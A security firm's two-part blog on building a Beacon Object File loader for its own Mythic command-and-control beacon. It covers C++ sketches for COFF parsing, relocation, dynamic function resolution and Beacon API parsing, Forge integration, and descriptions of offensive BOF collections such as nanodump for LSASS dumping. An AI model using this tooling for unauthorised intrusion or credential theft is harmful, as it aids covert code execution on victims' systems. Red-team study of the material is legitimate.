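    unsigned char* d = static_cast<unsigned char*>(dst);
    const unsigned char* s = static_cast<const unsigned char*>(src);
    for (std::size_t i = 0; i < n; ++i) {
        d[i] = s[i];
    }
    return dst;
}

// Fills `n` bytes at `dst` with the low byte of `value`, like memset.
void* bof_memset(void* dst, int value, std::size_t n) {
    assert(dst != nullptr);
    unsigned char* d = static_cast<unsigned char*>(dst);
    for (std::size_t i = 0; i < n; ++i) {
        d[i] = static_cast<unsigned char>(value);
    }
    return dst;
}
```

One caveat for shellcode builds: optimizing compilers can recognize such loops and replace them with calls to the real memcpy or memset, which do not exist in this setting. Whether and how this has to be suppressed (for example with compiler flags) depends on the toolchain and is not covered by this sketch.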

Regarding string manipulation, we can implement the functions strlen, strncmp, strncpy, strtok_r and strtol ourselves (see BOFLoader/StringManipulation.cpp). The string tokenizer strtok_r, which may be somewhat unusual in this list, is needed for the implementation of Dynamic Function Resolution (DFR) to split the string at the $ character (see the first blog post on this topic). The rest of the functions are needed from time to time, e.g., to process section or symbol names.
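
To make the DFR use case concrete, the following is a minimal sketch of a reentrant tokenizer with the same calling convention as strtok_r, used to split a DFR symbol such as KERNEL32$VirtualAlloc. It is not the code from BOFLoader/StringManipulation.cpp, and the name bof_strtok_r is hypothetical.

```cpp
#include <cassert>

// Returns true if `c` occurs in the null-terminated delimiter list.
static bool is_delim(char c, const char* delims) {
    for (const char* d = delims; *d != '\0'; ++d) {
        if (*d == c) {
            return true;
        }
    }
    return false;
}

// Reentrant tokenizer in the style of strtok_r: pass the string on the first
// call and nullptr afterwards. The input buffer is modified in place.
// (Hypothetical name, illustrative only.)
char* bof_strtok_r(char* str, const char* delims, char** saveptr) {
    assert(delims != nullptr && saveptr != nullptr);
    char* p = (str != nullptr) ? str : *saveptr;
    if (p == nullptr) {
        return nullptr;
    }
    // Skip leading delimiters.
    while (*p != '\0' && is_delim(*p, delims)) {
        ++p;
    }
    if (*p == '\0') {
        *saveptr = nullptr;
        return nullptr;
    }
    char* token = p;
    while (*p != '\0' && !is_delim(*p, delims)) {
        ++p;
    }
    if (*p != '\0') {
        *p = '\0';          // terminate the token
        *saveptr = p + 1;   // continue after the delimiter next time
    } else {
        *saveptr = nullptr; // end of input reached
    }
    return token;
}
```

Calling it twice on a writable copy of "KERNEL32$VirtualAlloc" with "$" as the delimiter yields the library name first and the function name second; a third call returns nullptr.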

That almost checks off the first item from our requirements list. We still need the four Windows API functions that are linked to the BOF by default because our loader needs to know them too: LoadLibraryA, GetModuleHandleA, GetProcAddress and FreeLibrary. We’ll now define function types for all of these functions so that the caller knows which function signatures to comply with. We also want to leave it up to the caller to decide how DFR should resolve functions. To do this, we additionally define the function type ResolveFunc_t, which takes the library name and function name as parameters of type const char* and should return the function pointer as void*.

We call all these functions external functions, for which we define a struct that is used to hold the pointers to them. The definitions for them look like this:

#include "wintypes.h" // for Windows types (e.g. HANDLE, LPVOID, etc.)

typedef LPVOID(__stdcall* VirtualAlloc_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect);
typedef BOOL(__stdcall* VirtualFree_t)(LPVOID lpAddress, SIZE_T dwSize, DWORD dwFreeType);
typedef LPVOID(__stdcall* HeapAlloc_t)(HANDLE hHeap, DWORD wFlags, SIZE_T dwBytes);
typedef BOOL(__stdcall* HeapFree_t)(HANDLE hHeap, DWORD dwFlags, LPVOID lpMem);
typedef HANDLE(__stdcall* GetProcessHeap_t)();

// These functions are the ones that are injected to a BOF by default
typedef HMODULE(*LoadLibraryA_t)(LPCSTR lpLibFilename);
typedef HMODULE(*GetModuleHandleA_t)(LPCSTR lpModuleName);
typedef FARPROC(*GetProcAddress_t)(HMODULE hModule, LPCSTR lpProcName);
typedef BOOL(*FreeLibrary_t)(HMODULE hLibModule);

// DFR resolve function
typedef void*(*ResolveFunc_t)(const char* lib, const char* func);

typedef struct external_functions {
    VirtualAlloc_t VirtualAlloc;
    VirtualFree_t VirtualFree;
    HeapAlloc_t HeapAlloc;
    HeapFree_t HeapFree;
    GetProcessHeap_t GetProcessHeap;
    LoadLibraryA_t LoadLibraryA;
    GetModuleHandleA_t GetModuleHandleA;
    GetProcAddress_t GetProcAddress;
    FreeLibrary_t FreeLibrary;
    ResolveFunc_t ResolveFunc;
} external_functions_t, * external_functions_ptr_t;

Passing the Beacon API functions

We must do the same with the Beacon APIs. They also have to be implemented by the caller. In addition to the frequently used Data Parser, Format and Output APIs, we have also implemented the Token and Utility APIs, as their implementations are relatively simple. Then we define the function types and the struct to hold them again. We call those functions the Cobalt Strike Compatibility Functions (cs_compat_functions).

#include "wintypes.h" // for Windows types (e.g. HANDLE, LPVOID, etc.)

typedef struct {
    char* original;
    char* buffer;
    int   length;
    int   size;
} datap_t;

typedef struct {
    char* original; // the original buffer
    char* buffer;   // current pointer into our buffer
    int   length;    // remaining length of data
    int   size;        // total size of this buffer
} formatp_t;

// Data Parser API
typedef void (*BeaconDataParse_t)(datap_t* parser, char* buffer, int size);
typedef int (*BeaconDataInt_t)(datap_t* parser);
typedef short (*BeaconDataShort_t)(datap_t* parser);
typedef int (*BeaconDataLength_t)(datap_t* parser);
typedef char* (*BeaconDataExtract_t)(datap_t* parser, int* size);

// Format API
typedef void (*BeaconFormatAlloc_t)(formatp_t* format, int maxsz);
typedef void (*BeaconFormatReset_t)(formatp_t* format);
typedef void (*BeaconFormatFree_t)(formatp_t* format);
typedef void (*BeaconFormatAppend_t)(formatp_t* format, char* text, int len);
typedef void (*BeaconFormatPrintf_t)(formatp_t* format, char* fmt, ...);
typedef char* (*BeaconFormatToString_t)(formatp_t* format, int* size);
typedef void (*BeaconFormatInt_t)(formatp_t* format, int value);

// Output API
typedef void (*BeaconPrintf_t)(int type, char* fmt, ...);
typedef void (*BeaconOutput_t)(int type, char* data, int len);

// Token API
typedef BOOL (*BeaconUseToken_t)(HANDLE token);
typedef void (*BeaconRevertToken_t)(void);
typedef BOOL (*BeaconIsAdmin_t)(void);

// Utility API
typedef BOOL (*toWideChar_t)(char* src, wchar_t* dst, int max);
typedef struct cs_compat_functions {
    // Data Parser API
    BeaconDataParse_t BeaconDataParse;
    BeaconDataInt_t BeaconDataInt;
    BeaconDataShort_t BeaconDataShort;
    BeaconDataLength_t BeaconDataLength;
    BeaconDataExtract_t BeaconDataExtract;

    // Format API
    BeaconFormatAlloc_t BeaconFormatAlloc;
    BeaconFormatReset_t BeaconFormatReset;
    BeaconFormatFree_t BeaconFormatFree;
    BeaconFormatAppend_t BeaconFormatAppend;
    BeaconFormatPrintf_t BeaconFormatPrintf;
    BeaconFormatToString_t BeaconFormatToString;
    BeaconFormatInt_t BeaconFormatInt;

    // Output API
    BeaconPrintf_t BeaconPrintf;
    BeaconOutput_t BeaconOutput;

    // Token API
    BeaconUseToken_t BeaconUseToken;
    BeaconRevertToken_t BeaconRevertToken;
    BeaconIsAdmin_t BeaconIsAdmin;

    // Utility API
    toWideChar_t toWideChar;
} cs_compat_functions_t, * cs_compat_functions_ptr_t;
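
Since the caller has to implement these functions, a minimal sketch of the Data Parser API may help. It is modeled on the behavior of publicly available Beacon API compatibility layers and is an assumption, not the implementation from our beacon: it assumes a little-endian blob that starts with a 4-byte total size, 4-byte integers, and strings with a 4-byte length prefix.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Same layout as the datap_t struct shown above.
struct datap_t {
    char* original; // start of the whole blob
    char* buffer;   // current read position
    int   length;   // bytes left to read
    int   size;     // payload size without the size prefix
};

// Initializes the parser and skips the 4-byte total-size prefix.
void BeaconDataParse(datap_t* parser, char* buffer, int size) {
    assert(parser != nullptr);
    if (buffer == nullptr || size < 4) {
        *parser = datap_t{nullptr, nullptr, 0, 0};
        return;
    }
    parser->original = buffer;
    parser->buffer = buffer + 4;
    parser->length = size - 4;
    parser->size = size - 4;
}

// Returns the number of bytes that have not been consumed yet.
int BeaconDataLength(datap_t* parser) {
    return parser->length;
}

// Reads a 4-byte integer; returns 0 if not enough data is left.
int BeaconDataInt(datap_t* parser) {
    if (parser->length < 4) {
        return 0;
    }
    std::int32_t value = 0;
    std::memcpy(&value, parser->buffer, 4);
    parser->buffer += 4;
    parser->length -= 4;
    return value;
}

// Reads a length-prefixed buffer; returns nullptr if the prefix claims more
// data than is available, instead of reading out of bounds.
char* BeaconDataExtract(datap_t* parser, int* size) {
    if (parser->length < 4) {
        return nullptr;
    }
    std::uint32_t len = 0;
    std::memcpy(&len, parser->buffer, 4);
    if (len > static_cast<std::uint32_t>(parser->length - 4)) {
        return nullptr;
    }
    char* out = parser->buffer + 4;
    parser->buffer += 4 + len;
    parser->length -= 4 + static_cast<int>(len);
    if (size != nullptr) {
        *size = static_cast<int>(len);
    }
    return out;
}
```

The bounds checks are a deliberate design choice in this sketch: because the BOF runs inside the beacon process, a parser that trusts the length fields blindly would turn a malformed argument blob into a crash of the whole beacon.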

This means we have already fulfilled four of the five requirements. We still need to package all this in a format that is suitable for the caller: the public API for the BOF loader.

Definition of the public API

The public API should typically consist of a single public function: RunBOF. This function requires the following information:

  • Pointer to the struct containing the external functions (required by the loader itself and for linking them into the BOF)
  • Pointer to the struct containing the Beacon API functions (only for linking them into the BOF)
  • The name of the entry point function in the BOF (by convention go, similar to main in executable programs)
  • The BOF itself as well as its size
  • The binary blob with the parameters for the BOF as well as its size

This results in the following function signature:

int RunBOF(
    external_functions_ptr_t external_functions,
    cs_compat_functions_ptr_t compat_functions,
    char* functionname,
    unsigned char* coff_data, uint32_t filesize,
    unsigned char* argument_data, int argument_size
)

Because it makes things easier, we will add a second function, UnhexlifyArgs, which converts the parameter binary blob from a hex string into raw bytes. The string is either generated by Mythic or can be generated manually using TrustedSec’s beacon_generate.py script. The signature of UnhexlifyArgs then looks like this:

unsigned char* UnhexlifyArgs(
    external_functions_ptr_t external_functions,
    unsigned char* value,
    int* outlen
)

UnhexlifyArgs also requires the external functions, e.g., for strlen and HeapAlloc.
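
The conversion itself is straightforward. The following minimal sketch shows the idea with a simplified, hypothetical signature: instead of the external_functions struct it takes a single allocator callback (alloc_fn), and it is not the published UnhexlifyArgs implementation.

```cpp
#include <cassert>
#include <cstddef>

// Allocator callback supplied by the caller (hypothetical type; the real
// loader receives its allocation functions through external_functions).
using alloc_fn = void* (*)(std::size_t);

// Converts one hex digit to its value, or returns -1 for invalid input.
static int hex_nibble(char c) {
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

// Converts a hex string such as "0400" into raw bytes. Returns nullptr for
// empty input, an odd number of digits, invalid characters or a failed
// allocation. The caller owns the returned buffer.
unsigned char* unhexlify(const char* hex, alloc_fn alloc, int* outlen) {
    assert(hex != nullptr && alloc != nullptr && outlen != nullptr);
    // Validate first, so nothing has to be freed on malformed input.
    std::size_t len = 0;
    while (hex[len] != '\0') {
        if (hex_nibble(hex[len]) < 0) {
            return nullptr;
        }
        ++len;
    }
    if (len == 0 || len % 2 != 0) {
        return nullptr;
    }
    unsigned char* out = static_cast<unsigned char*>(alloc(len / 2));
    if (out == nullptr) {
        return nullptr;
    }
    for (std::size_t i = 0; i < len / 2; ++i) {
        const int hi = hex_nibble(hex[2 * i]);
        const int lo = hex_nibble(hex[2 * i + 1]);
        out[i] = static_cast<unsigned char>((hi << 4) | lo);
    }
    *outlen = static_cast<int>(len / 2);
    return out;
}
```

Validating the whole string before allocating keeps the error paths free of cleanup code, which is convenient when the matching free function also has to come from the caller.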

This means that we have fulfilled all requirements and received all necessary functions from the caller. All that is missing now is the actual implementation of the linking process and DFR.

Doing all the heavy linking and DFR

We have already discussed the theory of how linking must take place in the first part of this blog post series. There is not much magic happening here. That is why we will take a high-level look at what the BOF loader does.

First, we read the BOF’s file header. Then we allocate an array sectionMapping, which later tracks the contents of each section and performs the relocations in there. In preparation, we iterate over all section headers, count the number of necessary relocations and copy the section data into the sectionMapping. We then iterate over the sections a second time, but now to actually perform the relocations. For each relocation entry, we determine whether the symbol in question is an internal or external symbol. This is important here for two reasons: First, different relocation types are used for different symbol types. To avoid having to implement all of them (some of which have even been deprecated for decades and are no longer used), we make this distinction here. Second, we have to resolve external symbols ourselves in order to place DFR functions or the Beacon APIs there.
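
The first pass can be sketched as follows. The struct layouts follow the PE/COFF specification (20-byte file header, 40-byte section headers); the function name count_relocations is hypothetical, and the sketch only counts relocations instead of also copying section data as the loader does.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <cstring>

#pragma pack(push, 1)
// COFF file header as defined in the PE/COFF specification.
struct CoffFileHeader {
    std::uint16_t Machine;
    std::uint16_t NumberOfSections;
    std::uint32_t TimeDateStamp;
    std::uint32_t PointerToSymbolTable;
    std::uint32_t NumberOfSymbols;
    std::uint16_t SizeOfOptionalHeader;
    std::uint16_t Characteristics;
};

// COFF section header as defined in the PE/COFF specification.
struct CoffSectionHeader {
    char Name[8];
    std::uint32_t VirtualSize;
    std::uint32_t VirtualAddress;
    std::uint32_t SizeOfRawData;
    std::uint32_t PointerToRawData;
    std::uint32_t PointerToRelocations;
    std::uint32_t PointerToLinenumbers;
    std::uint16_t NumberOfRelocations;
    std::uint16_t NumberOfLinenumbers;
    std::uint32_t Characteristics;
};
#pragma pack(pop)

static_assert(sizeof(CoffFileHeader) == 20, "unexpected file header size");
static_assert(sizeof(CoffSectionHeader) == 40, "unexpected section header size");

// Walks all section headers and sums up their relocation counts.
// Returns false if the buffer is too small for the headers it announces.
// (Hypothetical helper, illustrative only.)
bool count_relocations(const std::uint8_t* data, std::size_t size,
                       std::uint32_t* total) {
    assert(data != nullptr && total != nullptr);
    if (size < sizeof(CoffFileHeader)) {
        return false;
    }
    CoffFileHeader header;
    std::memcpy(&header, data, sizeof(header));
    // Object files normally have no optional header, but skip it if present.
    std::size_t offset = sizeof(CoffFileHeader) + header.SizeOfOptionalHeader;
    std::uint32_t sum = 0;
    for (std::uint16_t i = 0; i < header.NumberOfSections; ++i) {
        if (offset + sizeof(CoffSectionHeader) > size) {
            return false;
        }
        CoffSectionHeader section;
        std::memcpy(&section, data + offset, sizeof(section));
        sum += section.NumberOfRelocations;
        offset += sizeof(CoffSectionHeader);
    }
    *total = sum;
    return true;
}
```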

In two large if / else if control structures (one for internal and one for external symbols), we check the requested relocation type. For internal symbols, the BOF loader supports these relocation types:

  • IMAGE_REL_AMD64_ADDR64
  • IMAGE_REL_AMD64_ADDR32NB
  • IMAGE_REL_AMD64_REL32
  • IMAGE_REL_AMD64_REL32_1
  • IMAGE_REL_AMD64_REL32_2
  • IMAGE_REL_AMD64_REL32_3
  • IMAGE_REL_AMD64_REL32_4
  • IMAGE_REL_AMD64_REL32_5
  • IMAGE_REL_I386_DIR32
  • IMAGE_REL_I386_REL32

The following relocation types are supported for external symbols:

  • IMAGE_REL_AMD64_ADDR64
  • IMAGE_REL_AMD64_REL32 (this is the type used for function relocations)
  • IMAGE_REL_AMD64_ADDR32NB
  • IMAGE_REL_I386_DIR32
  • IMAGE_REL_I386_REL32

However, before we relocate the external symbol we are currently processing, we first need to find the relocation target of the symbol, i.e., one of the corresponding function pointers that was provided to the loader by the caller. To do this, we use the helper function process_symbol. It receives the raw symbol name and first removes the platform-dependent prefix (__imp__ or __imp_). It then checks whether the remainder of the name references a Beacon API function or one of the four Windows API functions that are linked into BOFs by default. If that’s the case, the function pointer is known (as it was provided by the caller) and can be returned from the process_symbol function directly. If not, we can be almost certain that it is a DFR symbol. Hence, we use the self-implemented string tokenizer to split the symbol string at the $ character and pass the parts (library and function name) to the ResolveFunc, also provided by the caller. We then (hopefully) receive our function pointer from it, which we can use for relocation. After the process_symbol function has returned, we can use the resulting address and perform the relocation according to the requested relocation type.
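
The decision logic of this lookup can be sketched as follows. This is a simplified illustration and not the published process_symbol: it uses std::string for brevity (which the real loader cannot do), it only classifies the symbol instead of returning a function pointer, and the names classify_symbol, SymbolKind and ParsedSymbol are hypothetical. It also does not handle additional x86 name decorations such as @N suffixes.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

enum class SymbolKind { BeaconApi, LoaderFunction, Dfr, Unknown };

struct ParsedSymbol {
    SymbolKind kind;
    std::string library;  // only set for DFR symbols
    std::string function; // symbol name without prefix and library part
};

static bool starts_with(const std::string& s, const std::string& prefix) {
    return s.compare(0, prefix.size(), prefix) == 0;
}

// Strips the import prefix and decides how the symbol has to be resolved.
ParsedSymbol classify_symbol(const std::string& raw, bool is_x86) {
    // x86 symbols carry an additional leading underscore.
    const std::string prefix = is_x86 ? "__imp__" : "__imp_";
    std::string name = raw;
    if (starts_with(name, prefix)) {
        name.erase(0, prefix.size());
    }
    // Beacon API functions are provided by the caller.
    if (starts_with(name, "Beacon") || name == "toWideChar") {
        return {SymbolKind::BeaconApi, "", name};
    }
    // The four Windows API functions that are available to every BOF.
    if (name == "LoadLibraryA" || name == "GetModuleHandleA" ||
        name == "GetProcAddress" || name == "FreeLibrary") {
        return {SymbolKind::LoaderFunction, "", name};
    }
    // Everything of the form LIBRARY$Function is treated as a DFR symbol.
    const std::size_t sep = name.find('$');
    if (sep != std::string::npos && sep > 0 && sep + 1 < name.size()) {
        return {SymbolKind::Dfr, name.substr(0, sep), name.substr(sep + 1)};
    }
    return {SymbolKind::Unknown, "", name};
}
```

In a real loader, the BeaconApi and LoaderFunction cases would return the matching pointer from the caller-provided structs, and the Dfr case would pass the library and function name to ResolveFunc.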

We now repeat this process for each section and each relocation within this section. A single error in this process stops the BOF from being invoked, as a single byte too far or too short in a relocation offset will eventually cause the BOF to crash anyway. Due to the lack of the fork-and-run principle, this also means that our beacon would crash, as the BOF runs within the same execution path.
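
To illustrate what performing a relocation means in practice, here is a minimal sketch for the AMD64 ADDR64 and REL32 family of relocation types. The numeric constants are taken from the PE/COFF specification; the function name apply_relocation is hypothetical, and the runtime address of the patched field is passed separately so that the arithmetic can be followed without real mapped sections.

```cpp
#include <cassert>
#include <cstdint>
#include <cstring>

// Relocation type values from the PE/COFF specification.
constexpr std::uint16_t kRelAmd64Addr64 = 0x0001;
constexpr std::uint16_t kRelAmd64Rel32 = 0x0004;
constexpr std::uint16_t kRelAmd64Rel32_5 = 0x0009;

// Patches the relocation field at `patch`.
//   patch_addr: address the field will have at run time
//   target:     run-time address of the symbol being referenced
// Returns false for unsupported types or if a 32-bit displacement overflows.
bool apply_relocation(std::uint8_t* patch, std::uint64_t patch_addr,
                      std::uint64_t target, std::uint16_t type) {
    assert(patch != nullptr);
    if (type == kRelAmd64Addr64) {
        // Absolute 64-bit address; the field already contains the addend.
        std::uint64_t addend = 0;
        std::memcpy(&addend, patch, sizeof(addend));
        const std::uint64_t value = target + addend;
        std::memcpy(patch, &value, sizeof(value));
        return true;
    }
    if (type >= kRelAmd64Rel32 && type <= kRelAmd64Rel32_5) {
        // RIP-relative: the displacement is measured from the end of the
        // 4-byte field, plus 0 to 5 extra bytes for the REL32_1..5 variants.
        std::int32_t addend = 0;
        std::memcpy(&addend, patch, sizeof(addend));
        const std::int64_t extra = type - kRelAmd64Rel32;
        const std::int64_t disp = static_cast<std::int64_t>(target) -
                                  static_cast<std::int64_t>(patch_addr + 4) -
                                  extra + addend;
        if (disp < INT32_MIN || disp > INT32_MAX) {
            return false; // target is too far away for a 32-bit displacement
        }
        const std::int32_t disp32 = static_cast<std::int32_t>(disp);
        std::memcpy(patch, &disp32, sizeof(disp32));
        return true;
    }
    return false;
}
```

The overflow check reflects the remark above: a relocation that cannot be represented must abort the load, because executing the BOF with a truncated displacement would crash the beacon.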

Now all that’s left is to implement the server-side component in Mythic.

Adding the server-side Mythic implementation

We cannot publish the server-side implementation because it is too closely linked to our beacon. However, it is not really difficult to do it yourself. To use the BOF loader in the beacon, you only need to add a new command to the Mythic payload container, which is then used to call the loader, e.g., execute_bof. This command only requires a file parameter for the BOF itself and a parameter of type “typed array,” which is used for parameterizing the BOF. We will explain why this typed array is important in more detail shortly. Optionally, the name of the entry point function (if different from go) and a chunk size for the transfer of the BOF file can be specified as parameters for the execute_bof command. You can read more about how to add new commands in the Mythic documentation, but if you have your own beacon, you should already be familiar with this: https://docs.mythic-c2.net/customizing/payload-type-development/adding-commands/commands

Depending on the setup, the translator may need to be adjusted to support Mythic’s typed array type, as it is still quite new. But otherwise, the Mythic implementation is now complete. This is what the parameter UI for the new command in Mythic looks like:

Figure 1: Parameter UI for the new execute_bof command in Mythic

Bonus: Achieving compatibility with Mythic’s Forge

The beacon and Mythic are now able to handle BOFs. However, there is still one thing missing, which other C2 frameworks have not yet been able to resolve and which prevents the use of certain BOFs: circumventing Aggressor Script.

On February 5, 2025, Cody Thomas (@its_a_feature_), the developer behind Mythic, announced a new plug-in called Forge. At first glance, it was described as a way to “standardize BOF/.NET execution within Mythic Agents.” But on closer inspection, Forge isn’t a universal runtime, really. Instead, it serves two key purposes: abstraction and library management.

Forge provides an operator interface for running BOFs and .NET assemblies. It doesn’t execute them directly but translates Mythic input into the correct invocation commands for each supported beacon (which would be execute_bof in our case). This means that each beacon must still provide its own BOF runtime, but Forge takes care of calling conventions through Mythic’s new “Command Augmentation” feature, which was introduced in version 3.3. Out of the box, Forge supports the official beacons Apollo and Athena.

Forge also integrates with tool collections like the Sliver Armory for BOFs and SharpCollection for .NET assemblies. These are indexes that provide direct download URLs to the payloads. Since we do not need .NET execution for now, we’re going to ignore the SharpCollection. Forge works perfectly fine with just BOFs.

The Sliver Armory is the package index for BOFs used in the Sliver C2 framework. Forge now makes it available for Mythic as well. For operators, this means easy access to a curated, pre-adapted BOF index. Additionally, the BOFs in this index have been adjusted to remove the Aggressor Script dependency as far as possible! This means no more hunting down scripts, patching Aggressor Script dependencies or manually compiling the BOFs. You just have a list of everything that is available and usable with Mythic, well, within Mythic:

Figure 2: Forge’s forge_collections command to list and manage registered BOFs (here: removing the “Reg Query” BOF)

After registering a BOF in Forge, it becomes available as a new callback command, e.g. forge_bof_sa-reg-query for the Reg Query BOF from the Situational Awareness collection. Metadata is also provided for each BOF, such as which parameters the BOF requires. With manual execution, you would have to find out the required parameters and encode them yourself. This is prone to errors: Incorrect parameter passing can lead to a crash in the implementation of the Data Parser Beacon API and thus also to a crash of the beacon.

Forge displays these BOF parameters directly in Mythic, as it does for built-in commands, within the parameter UI:

Figure 3: Forge’s parameter UI for the Reg Query BOF

In practice, Forge eliminates a lot of steps:

  • Searching external sources for (working) BOFs
  • Modifying them to run without Aggressor Script
  • Compiling and uploading them to the Mythic server manually
  • Encoding parameters by hand

In order to make our own beacon compatible with Forge alongside Athena and Apollo, only a single file in Forge needs to be modified: the payload_type_support.json. It contains the configuration of Forge’s abstraction layer for each payload type (aka beacon). All that needs to be done is to specify the target command for invoking the BOF loader as well as some of its parameters, which are then populated by Forge. This includes the names of the file parameter, the entry point parameter (this is also abstracted by the BOF metadata stored in the corresponding index) and the parameter in which the BOF arguments are passed. We will leave the fields for .NET execution blank for now, as we do not want to use this feature:

[
    <other payload types>,
    {
        "agent": "cirosec-beacon",
        "bof_command": "execute_bof",
        "bof_file_parameter_name": "file",
        "bof_argument_array_parameter_name": "args_array",
        "bof_entrypoint_parameter_name": "function_name",
        "inline_assembly_command": "",
        "inline_assembly_file_parameter_name": "",
        "inline_assembly_argument_parameter_name": "",
        "execute_assembly_command": "",
        "execute_assembly_file_parameter_name": "",
        "execute_assembly_argument_parameter_name": ""
    }
]

All parameters must, of course, be configured so that they can accept data populated by Forge: The file parameter must be of type “file,” the entry point is passed as a “string” and the BOF arguments as a “typed array,” as we have mentioned above. The parameters for the Reg Query BOF shown in Figure 3 would then be passed as follows:

[
    ["z", "CODE-LSC"],
    ["i", 1],
    ["z", "\Environment"],
    ["z", "PATH"],
    ["i", 0]
]

Here, the five parameters “hostname”, “hive”, “path”, “key” and “recursive” are specified in order. This format is specific to Mythic and Forge, but the type constants come from Cobalt Strike. In this case, “z” stands for “string” (while a capital “Z” would mean a wide string) and “i” is a 4-byte integer. The constants can be found in the Cobalt Strike documentation and must be understood by our BOF loader command for Forge to work properly. But since we have already implemented this, we are done here!
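
How such a typed array might be turned into the size-prefixed binary blob can be sketched as follows. The byte layout is an assumption modeled on TrustedSec’s beacon_generate.py (little-endian values, strings with a 4-byte length prefix and a terminating null byte, and a 4-byte total size in front); the class name BofArgPacker is hypothetical, and this is not the code of our execute_bof command.

```cpp
#include <cassert>
#include <cstdint>
#include <string>
#include <vector>

// Builds the argument blob for a BOF from typed values.
// (Hypothetical helper; the layout is an assumption, see the text above.)
class BofArgPacker {
public:
    // "i": 4-byte integer, little-endian.
    void add_int(std::int32_t value) {
        put_u32(body_, static_cast<std::uint32_t>(value));
    }

    // "s": 2-byte integer, little-endian.
    void add_short(std::int16_t value) {
        const std::uint16_t v = static_cast<std::uint16_t>(value);
        body_.push_back(static_cast<std::uint8_t>(v & 0xFF));
        body_.push_back(static_cast<std::uint8_t>(v >> 8));
    }

    // "z": length prefix (including the null byte), characters, null byte.
    void add_string(const std::string& text) {
        assert(text.size() < 0xFFFFFFFFu);
        put_u32(body_, static_cast<std::uint32_t>(text.size() + 1));
        body_.insert(body_.end(), text.begin(), text.end());
        body_.push_back(0);
    }

    // Returns the final blob: total size of all arguments, then the arguments.
    std::vector<std::uint8_t> finish() const {
        std::vector<std::uint8_t> blob;
        put_u32(blob, static_cast<std::uint32_t>(body_.size()));
        blob.insert(blob.end(), body_.begin(), body_.end());
        return blob;
    }

private:
    // Appends a 32-bit value byte by byte, least significant byte first.
    static void put_u32(std::vector<std::uint8_t>& out, std::uint32_t v) {
        for (int shift = 0; shift < 32; shift += 8) {
            out.push_back(static_cast<std::uint8_t>((v >> shift) & 0xFF));
        }
    }

    std::vector<std::uint8_t> body_;
};
```

For the Reg Query example, the caller would add the string "CODE-LSC", the integer 1, the strings "\Environment" and "PATH" and the integer 0 in this order and pass the result of finish() to the loader as argument_data.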

Now that Forge knows about our beacon configuration, we need to rebuild the Forge container, and we can start registering BOFs for our beacon. Since the commands and registrations only exist on the server side, they are also globally available for all callbacks without us having to touch the already deployed beacons.

Summing up – What now?

The characteristics of BOFs make red team operations much easier. The defending/attacked side in turn has a much harder time: Even if they have found and reverse-engineered one of our beacons, they cannot determine what it is capable of because the BOFs are not included in it. We now have the ability to introduce arbitrary code into every environment in which our beacon runs at any time we want.

We are currently in the process of building our own BOF index based on Forge. This will enable us to achieve even greater runtime stability and allow our malware developers to contribute their own BOF implementations, which we can use directly in our red teaming operations. The possibilities are endless from now on. We have also fed the changes we made to Forge back upstream and hope to see further developments in this area.

Further blog articles

Blog

Loader Dev. 4 – AMSI and ETW

April 30, 2024 – In the last post, we discussed how we can get rid of any hooks placed into our process by an EDR solution. However, there are also other mechanisms provided by Windows, which could help to detect our payload. Two of these are ETW and AMSI.

Author: Kolja Grassmann

Blog

Loader Dev. 1 – Basics

February 10, 2024 – This is the first post in a series of posts that will cover the development of a loader for evading AV and EDR solutions.

Author: Kolja Grassmann


Beacon Object Files for Mythic – Part 2

November 27, 2025

Beacon Object Files for Mythic: Enhancing Command and Control Frameworks – Part 2

This is the second post in a series of blog posts on how we implemented support for Beacon Object Files (BOFs) into our own command and control (C2) beacon using the Mythic framework. In this second post, we will present some concrete BOF implementations to show how they are used in the wild and how powerful they can be.

The blog post series accompanies the master’s thesis “Enhancing Command & Control Capabilities: Integrating Cobalt Strike’s Plugin System into a Mythic-based Beacon Developed at cirosec” by Leon Schmidt and the related source code release of our BOF loader.

Gathering a BOF Test Collection

As part of the development of our BOF loader, we had to look at how the BOFs we want to use with it in the future use the Beacon APIs, Aggressor Script and DFR. To do this, we put together a small collection of tests that are also great for showing what BOFs can do.

We searched GitHub for BOF repositories with as many stars as possible. This resulted in the following list of BOFs (you can safely skip this chapter if you are not interested in the individual BOFs):

fortra/nanodump

NanoDump is a powerful tool designed to create minidumps of the Local Security Authority Subsystem Service (LSASS) with the flexibility to adapt to various operational scenarios. It provides multiple methods to handle the dumping process, offering both direct and indirect techniques to obtain LSASS handles securely and covertly. Operators can choose to write the dump to a specified file path or create a valid signature for the dump to avoid detection. The tool supports advanced methods such as duplicating or elevating existing LSASS handles, leveraging the Seclogon service to leak or duplicate handles and using spoofed call stacks to evade security mechanisms. Additionally, NanoDump enables indirect dumping through external processes like WerFault.exe, which can be triggered using features such as SilentProcessExit or the Shtinkering technique.

trustedsec/CS-Situational-Awareness-BOF

Contrary to its name, CS-Situational-Awareness-BOF is not a single BOF but a collection of smaller BOFs for situational awareness, created by TrustedSec. There are BOFs for enumerating certificates, querying the local ARP table, sending LDAP queries to the local Active Directory, displaying the visible windows in the current user session and much more. Many of them reimplement individual Windows command-line commands as BOFs. As this collection covers the situational awareness area quite comprehensively, this project is probably one of the most important in terms of BOFs.

trustedsec/CS-Remote-OPs-BOF

CS-Remote-OPs-BOF again is a collection of BOFs developed by TrustedSec, complementing its earlier Situational Awareness BOF collection by introducing tools that modify system states, enabling a broader range of offensive security tasks. The BOFs included in this collection cover fundamental Windows operations, such as managing services, registry keys, scheduled tasks and user accounts. Additionally, the repository offers BOFs for process management, including dumping process memory and handling process states. Recognizing the importance of stealth and evasion, TrustedSec has also included injection BOFs used in EDR testing. While these are provided without support, they serve as valuable resources for understanding and implementing code injection techniques. This collection is probably as important as CS-Situational-Awareness-BOF for red team operations.

anthemtotheego/InlineExecute-Assembly

InlineExecute-Assembly is a PoC BOF developed to facilitate in-process execution of .NET assemblies. This approach serves as an alternative to Cobalt Strike’s traditional execute-assembly module, which typically employs a fork-and-run technique. By executing .NET assemblies directly within the current beacon process, InlineExecute-Assembly eliminates the need to spawn sacrificial processes, thereby reducing the operational footprint and enhancing stealth during engagements. The tool is designed to handle assemblies with entry points defined as Main(string[] args) or Main(), allowing for the execution of most existing .NET tools without requiring modifications. It does this by automatically determining and loading the appropriate CLR version before execution.

